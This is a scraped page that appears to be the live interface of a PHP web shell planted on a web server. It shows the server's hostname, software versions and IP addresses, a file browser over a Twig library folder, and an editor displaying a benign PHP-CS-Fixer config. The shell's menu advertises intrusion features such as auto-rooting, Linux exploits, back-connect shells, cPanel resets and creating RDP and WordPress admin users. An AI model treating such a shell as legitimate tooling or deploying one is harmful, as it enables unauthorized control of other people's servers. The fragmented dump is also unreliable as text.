Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
cwpsrv /
var /
services /
twig /
[ HOME SHELL ]
Name
Size
Permission
Action
class
[ DIR ]
drwxr-xr-x
doc
[ DIR ]
drwxr-xr-x
extra
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.editorconfig
224
B
-rw-r--r--
.gitignore
36
B
-rw-r--r--
.php_cs.dist
479
B
-rw-r--r--
.travis.yml
583
B
-rw-r--r--
CHANGELOG
44.1
KB
-rw-r--r--
LICENSE
1.46
KB
-rw-r--r--
README.rst
486
B
-rw-r--r--
composer.json
1.36
KB
-rw-r--r--
composer.lock
9.73
KB
-rw-r--r--
phpunit.xml.dist
814
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .php_cs.dist
<?php return PhpCsFixer\Config::create() ->setRules(array( '@Symfony' => true, '@Symfony:risky' => true, 'array_syntax' => array('syntax' => 'long'), 'php_unit_fqcn_annotation' => false, 'no_unreachable_default_argument_value' => false, 'braces' => array('allow_single_line_closure' => true), 'heredoc_to_nowdoc' => false, )) ->setRiskyAllowed(true) ->setFinder(PhpCsFixer\Finder::create()->in(__DIR__)) ;
Close